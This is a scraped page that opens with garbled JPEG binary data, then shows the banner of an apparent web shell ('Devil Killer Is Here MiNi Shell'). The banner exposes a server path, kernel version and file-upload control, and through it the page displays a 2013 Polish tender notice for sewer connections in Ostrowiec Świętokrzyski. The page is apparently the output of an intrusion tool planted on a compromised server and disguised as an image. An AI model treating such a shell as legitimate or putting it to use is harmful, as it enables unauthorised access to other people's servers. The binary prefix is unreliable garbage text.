JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130830/352162-N-2013.html

<p class="kh_header"><b>Ostrowiec Świętokrzyski: Budowa  przykanalików  ścieków sanitarnych  celem podłączenia budynków do zbiorczego systemu kanalizacyjnego w Ostrowcu Świętokrzyskim   w ramach programu priorytetowego Dofinansowanie  przydomowych oczyszczalni ścieków  oraz podłączeń budynków do  zbiorczego systemu kanalizacyjnego przez  Narodowy Fundusz Ochrony Środowiska i Gospodarki  Wodnej w Warszawie</b><br>
<b>Numer ogłoszenia: 352162 - 2013; data zamieszczenia: 30.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Wodociągi i Kanalizacja sp. z o.o. , ul. Sienkiewicza 91, 27-400 Ostrowiec Świętokrzyski, woj. świętokrzyskie, tel. 041 2661200, faks 041 2661010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodociagi.ostrowiec.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością - 100 udziałów Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  przykanalików  ścieków sanitarnych  celem podłączenia budynków do zbiorczego systemu kanalizacyjnego w Ostrowcu Świętokrzyskim   w ramach programu priorytetowego Dofinansowanie  przydomowych oczyszczalni ścieków  oraz podłączeń budynków do  zbiorczego systemu kanalizacyjnego przez  Narodowy Fundusz Ochrony Środowiska i Gospodarki  Wodnej w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu odcinków przykanalików sanitarnych na działkach należących do osób prywatnych, z włączeniem do wykonanych odcinków przykanalików w pasach drogowych lub włączeniem do studni na kanałach sanitarnych zlokalizowanych na działkach prywatnych.
Budowa wyżej wymienionych odcinków przykanalików sanitarnych realizowana będzie w ramach programu Dofinansowania przydomowych oczyszczalni ścieków oraz podłączeń budynków do zbiorczego systemu kanalizacyjnego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie.
Zamawiający ma zawarte umowy cywilno-prawne dotyczące dysponowaniem  nieruchomościami dla potrzeb wykonania przykanalików.
Przykanaliki wykonywane będą w systemie  grawitacyjnym o łącznej długości dla wszystkich zadań 6 825,90m. 
Przykanaliki należy wykonać z rur PCV  DN160 i DN 200 o klasie wytrzymałości SN 4
Studzienki rewizyjne  betonowe DN1000mm  z betonu C30/37  z włazami żeliwnymi 
Studzienki rewizyjne  z tworzyw sztucznych PE ( PP)  DN400 ( 425)
Kaskady z kształtek PCV  przy  studniach betonowych winny być obetonowane
Kaskady  z kształtek PCV przy studniach z tworzyw sztucznych nie wymagają betonowania 
Zabezpieczenie rurociągu przed zamarzaniem- żużlem paleniskowym 25 cm + papa asfaltowa
Wynagrodzenie  za wykonanie przedmiotu zamówienia  będzie wynagrodzeniem obmiarowym wg rzeczywistych jednostek obmiarowych i cen jednostkowych podanych przez Wykonawcę robót w kosztorysie ofertowym.
Cena jednostkowa  za 1mb wykonanego przykanalika ( liczonego miedzy osiami studzienek rewizyjnych) winna uwzględniać wszystkie roboty i materiały  niezbędne do wykonania  przykanalika.
Cena jednostkowa za  wykonanie studzienki rewizyjnej  winna uwzględniać wszystkie  roboty  i materiały  związane   z wykonaniem  studzienki rewizyjnej.
Przedmiot zamówienia obejmuje realizację 3 niezależnych zadań (zamówień częściowych):
Zadanie 1. Budowa przykanalików sanitarnych na ul. Bałtowskiej i Osiedlu Koszary - obejmującej wykonanie 124 odcinków przykanalików o łącznej długości 2369,60 m, w tym o 200 mm 92,70 m, o 160 mm 2276,90 m. Zakres realizowanych przykanalików w ramach zadania 1:
a)	Etap I (czas realizacji do 31.12.2013 r.) obejmuje:
- ul. Kopalniana - budowa 5 odcinków przykanalików o 160 mm o łącznej długości 19,20 m,
- ul. Skośna - budowa 16 odcinków przykanalików o 160 mm o łącznej długości 274,50 m,
- ul. Zbożowa - budowa 4 odcinków przykanalików o 160 mm o łącznej długości 75,40 m,
b) Etap II (czas realizacji do 30.06.2014 r.) obejmuje:
- ul. Bałtowska wschód - budowa 59 odcinków przykanalików o łącznej długości 1367,80 m, w tym:                                                                                                            o 160 mm 1313,20 m,
o 200 mm 54,60 m,
c)	Etap III (czas realizacji do 30.09.2014 r.) obejmuje:
- ul. Bałtowska zachód - budowa 30 odcinków przykanalików o łącznej długości 413,70 m, w tym:
o 160 mm 375,60 m,
o 200 mm 38,10 m,
d)	Etap IV (czas realizacji do 15.11.2014 r.) obejmuje:
- ul. Bałtowska-Nadkoszary - budowa 6 odcinków przykanalików o 160 mm o łącznej długości 150,40 m,
- ul. Bursztynowa - budowa 4 odcinków przykanalików o 160 mm o łącznej długości 68,60 m.
Wykaz przyłączy realizowanych w ramach zadania nr 1 oraz zestawienie zbiorcze adresami - zadanie 1 zawarte są w pliku Dokumentacje projektowe/Dokumentacja projektowa-zadanie 1.
Zadanie 2. Budowa przykanalików sanitarnych na Osiedlu Gutwin - obejmującej wykonanie 142 odcinków przykanalików o łącznej długości 3155,95 m, w tym o 200 mm 74,00 m, o 160 mm 3167,00 m. Zakres realizowanych przykanalików w ramach zadania 2:
a)	Etap I (czas realizacji do 31.12.2013 r.) obejmuje:
- ul. Gajowa - budowa 25 odcinków przykanalików o łącznej długości 704,20 m, w tym:
o 160 mm 630,20 m,
o 200 mm 74,00 m,
- ul. Leśna - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 56,70 m,
- ul. Gościniec - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 41,80 m,
- ul. Akacjowa - budowa 21 odcinków przykanalików o 160 mm o łącznej długości 584,20 m,
- ul. Jałowcowa - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 38,10 m,
- ul. Miodowa - budowa 13 odcinków przykanalików o 160 mm o łącznej długości 287,80 m,
- ul. Wrzosowa - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 53,20 m,
b) Etap II (czas realizacji do 30.06.2014 r.) obejmuje:
- ul. Siennieńska - budowa 18 odcinków przykanalików o 160 mm o łącznej długości 340,00 m, 
c)	Etap III (czas realizacji do 30.09.2014 r.) obejmuje:
- ul. Rzeczki - budowa 31 odcinków przykanalików o 160 mm o łącznej długości 659,30 m, 
d)	Etap IV (czas realizacji do 15.11.2014 r.) obejmuje:
- ul. Agrestowa - budowa 7 odcinków przykanalików o 160 mm o łącznej długości 80,10 m,
- ul. Jarzębinowa - budowa 12 odcinków przykanalików o 160 mm o łącznej długości 234,90 m, 
- ul. Malinowa - budowa 2 odcinków przykanalików o 160 mm o łącznej długości 67,20 m,
- ul. Korzenna - budowa 1 odcinka przykanalika o 160 mm o długości 19,50 m. 
Wykaz przyłączy realizowanych w ramach zadania nr 2 oraz zestawienie zbiorcze adresami - zadanie 2 zawarte są w pliku Dokumentacje projektowe/Dokumentacja projektowa-zadanie 2.
Zadanie 3. Budowa przykanalików sanitarnych na Osiedlu Częstocice, ul. Boczna, ul. Górna, ul. Nowe Piaski, ul. Partyzantów, ul. Tomaszów - obejmującej wykonanie 76 odcinków przykanalików o łącznej długości o 160 mm 1289,30 m. Zakres realizowanych przykanalików w ramach zadania 3:
a)	Etap I (czas realizacji do 31.12.2013 r.) obejmuje:
- ul. Józefówka - budowa 7 odcinków przykanalików o 160 mm o łącznej długości 123,50 m, w tym:
b) Etap II (czas realizacji do 30.06.2014 r.) obejmuje:
- ul. Szewieńska - budowa 10 odcinków przykanalików o 160 mm o łącznej długości 145,80 m, 
-  ul. Mała - budowa 1 odcinka przykanalika o 160 mm o długości 2,00 m,
- 	 ul. Podgórze - budowa 32 odcinków przykanalików o 160 mm o łącznej długości 355,50 m,
c)	Etap III (czas realizacji do 30.09.2014 r.) obejmuje:
- ul. Świętokrzyska - budowa 12 odcinków przykanalików o 160 mm o łącznej długości 273,10 m, 
-  ul. Boczna - budowa 1 odcinka przykanalika o 160 mm o długości 5,90 m, 
-  ul. Górna - budowa 1 odcinka przykanalika o 160 mm o długości 28,00 m,
- ul. Nowe Piaski - budowa 3 odcinków przykanalików o 160 mm o łącznej długości 195,10 m,
-  ul. Partyzantów - budowa 1 odcinka przykanalika o 160 mm o długości 13,90m, 
-  ul. Tomaszów - budowa 1 odcinka przykanalika o 160 mm o długości 46,00m,
d)	Etap IV (czas realizacji do 15.11.2014 r.) obejmuje:
- ul. Sadowa - budowa 7 odcinków przykanalików o 160 mm o łącznej długości 100,50 m,
Wykaz przyłączy realizowanych w ramach zadania nr 3 oraz zestawienie zbiorcze adresami - zadanie 3 zawarte są w pliku Dokumentacje projektowe Dokumentacja projektowa-zadanie 3.
2.2	Budowa wyżej wymienionych odcinków przykanalików sanitarnych realizowana będzie w ramach programu Dofinansowania przydomowych oczyszczalni ścieków oraz podłączeń budynków do zbiorczego systemu kanalizacyjnego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie.
2.3	Pieczę nad realizacją zamówienia sprawuje Inspektor Nadzoru, który ocenia zgodność realizacji przedsięwzięcia z projektem, kontroluje jakość i ilość robót, opiniuje zasadność wykonania i rozliczenie robót dodatkowych kontroluje rozliczenie finansowe budowy, potwierdza  zakres wykonanych robót,
2.4	Roboty budowlane, będące przedmiotem zamówienia, wykonywane będą na podstawie zgłoszenia robót zgodnie z art. 29a ust. 1,2   Ustawy-Prawo Budowlane z dnia 7 lipca 1994 r. z późn. zm.
2.5 Wynagrodzenie  za  przedmiot umowy   będzie  wynagrodzeniem obmiarowym.
Cena jednostkowa  za 1mb wykonanego przykanalika  liczonego miedzy osiami studzienek rewizyjnych) winna uwzględniać wszystkie roboty i materiały  niezbędne do wykonania  przykanalika.
Cena jednostkowa za  wykonanie studzienki rewizyjnej  winna uwzględniać wszystkie  roboty  i materiały  związane   z wykonaniem  studzienki rewizyjnej.
2.6 Prosi się aby Wykonawcy  przed złożeniem oferty przyprowadzili wizje lokalną.
2.2  	Termin wykonania zamówienia.
Termin realizacji przedmiotu zamówienia (3 zadania częściowe) podzielony jest na 4 etapy:
I etap	do 31.12.2013 r.
II etap	do 30.06.2014 r.
III etap 	do 30.09.2014 r.
IV etap 	do 15.11.2014 r.
Termin zakończenia robót budowlanych, będących przedmiotem zamówienia - do 15 listopada 2014 r.
2.3	 Szczegółowy opis przedmiotu zamówienia
Szczegółowy zakres robót będący przedmiotem zamówienia określają:
1. Wzór umowy wraz z załącznikami nr 1,2,3 do umowy- załącznik nr 7 do SIWZ
2. Dokumentacja projektowa- załącznik nr 8 do SIWZ
3. Specyfikacja Techniczna - załącznik nr 9 do SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 u.p.z.p., stanowiących nie więcej niż 10 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.40-6, 45.23.31.42-6, 45.23.24.52-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium;
Ofertę należy zabezpieczyć poprzez wniesienie wadium w wysokości:
Zadanie 1 - 12 000,00 zł (dwanaście tysięcy złotych)
Zadanie 2 - 15 000,00 zł (piętnaście tysięcy złotych)
Zadanie 3 - 5 000,00 zł (pięć tysięcy złotych)
Okres ważności wadium musi obejmować cały okres związania z ofertą,
Wadium wnosi się przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu (złotych),
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
Wadium w pieniądzu należy wpłacić przelewem na konto PEKAO S.A. 79 1240 4416 1111 0000 4956 4828. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego.
Wykonawca, którego oferta nie będzie zabezpieczona akceptowaną formą wadium, zostanie przez Zamawiającego wykluczony z postępowania.
Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu należytego wykonania umowy, jeżeli jego wniesienia żądano.
Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniężny na rachunek wskazany przez Wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust.3 ustawy nie złożył dokumentów lub oświadczeń o których mowa w art. 25  ust .1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
nie wniósł zabezpieczenia należytego wykonania umowy, lub
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółów. Obowiązkiem Wykonawcy składającego ofertę jest złożenie oświadczenia o spełnieniu tego warunku - załącznik nr 2 do SIWZ,
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być przedmiotowe oświadczenie złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub oświadczenie złożone (podpisane) przez każdego z Wykonawców składających ofertę wspólną - jedynie w sytuacji jeśli każdy z nich spełnia wszystkie warunki samodzielnie);
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółów. Obowiązkiem Wykonawcy składającego ofertę jest złożenie oświadczenia o spełnieniu tego warunku - załącznik nr 2 do SIWZ,
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być przedmiotowe oświadczenie złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub oświadczenie złożone (podpisane) przez każdego z Wykonawców składających ofertę wspólną - jedynie w sytuacji jeśli każdy z nich spełnia wszystkie warunki samodzielnie);
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  ma obowiązek dysponować  osobami zdolnymi do wykonania niniejszego zamówienia. Wykonawca może polegać na osobach zdolnych do wykonywania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są wskazać te osoby, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie dysponowania tymi osobami, w tym :
  - kierownikiem budowy z uprawnieniami do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci kanalizacyjnych lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa w zakresie sieci wodno-kanalizacyjnych.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.4.1	w szczególności Wykonawca posiada środki finansowe lub posiada zdolność kredytową w wysokości:
	dla zadania nr 1 co najmniej 500.000 PLN,
	dla zadania nr 2 co najmniej 600.000 PLN,
	dla zadania nr 3 co najmniej 200.000 PLN, 

Jeżeli Wykonawca, wykazując spełnianie warunku, o którym mowa w pkt 4.4.  polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26.2 ust. 2b ustawy, Wykonawca zobowiązany jest dołączyć do oferty informację, o której mowa w pkt. 5.4) SIWZ, dotyczącą tych podmiotów.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach dostarczonych przez Wykonawcę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz oferty sporządzony na podstawi wzoru stanowiącego załącznik nr 1 do SIWZ. 2.Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania Oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności
gospodarczej, 3.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i awarcia umowy w sprawie niniejszego zamówienia publicznego,</p>

